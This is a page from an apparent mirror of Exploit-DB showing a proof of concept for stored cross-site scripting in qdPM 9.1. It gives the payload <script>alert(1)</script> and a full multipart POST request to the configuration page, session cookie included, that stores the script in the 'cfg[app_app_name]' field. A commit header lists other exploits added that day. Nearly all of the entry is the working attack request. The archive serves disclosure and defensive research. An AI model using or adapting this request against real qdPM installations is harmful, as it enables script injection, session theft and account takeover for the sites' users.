bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48486.txt
Offensive Security 6bdc0c9fda DB: 2020-05-20 
8 changes to exploits/shellcodes

Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)
Victor CMS 1.0 - 'comment_author' Persistent Cross-Site Scripting
Victor CMS 1.0 - 'cat_id' SQL Injection
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting
php-fusion 9.03.50 - 'ctype' SQL Injection
Submitty 20.04.01 - Persistent Cross-Site Scripting
NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)
Victor CMS 1.0 - Authenticated Arbitrary File Upload
2020-05-20 05:01:48 +00:00

82 lines
No EOL
2.9 KiB
Text
Raw Blame History

# Exploit Title: qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://qdpm.net
# Software Link: https://sourceforge.net/projects/qdpm/
# Version: 9.1
# Tested on: Windows 10
Description: The form parameter 'cfg[app_app_name]' is vulnerable to stored cross site scripting
Payload: <script>alert(1)</script>
POST /index.php/configuration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------224716807133186052992861925563
Content-Length: 1881
Origin: http://localhost/
DNT: 1
Connection: close
Referer: http://localhost/index.php/configuration?type=general
Cookie: qdPM8=c14e5521818ec7a0c8bbc3099a96b94a
Upgrade-Insecure-Requests: 1
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="type"
general
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_administrator_email]"
admin@localhost.com
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_administrator_password]"
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_app_name]"
<script>alert(1)</script>
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_app_short_name]"
qdPM
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg_app_app_logo_file"; filename=""
Content-Type: application/octet-stream
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_app_logo]"
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[sf_default_timezone]"
America/New_York
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[sf_default_culture]"
ar
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_rows_per_page]"
25
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_rows_limit]"
1000
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_custom_short_date_format]"
d M Y
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_custom_logn_date_format]"
d M Y H:i
-----------------------------224716807133186052992861925563--
Reference in a new issue View git blame Copy permalink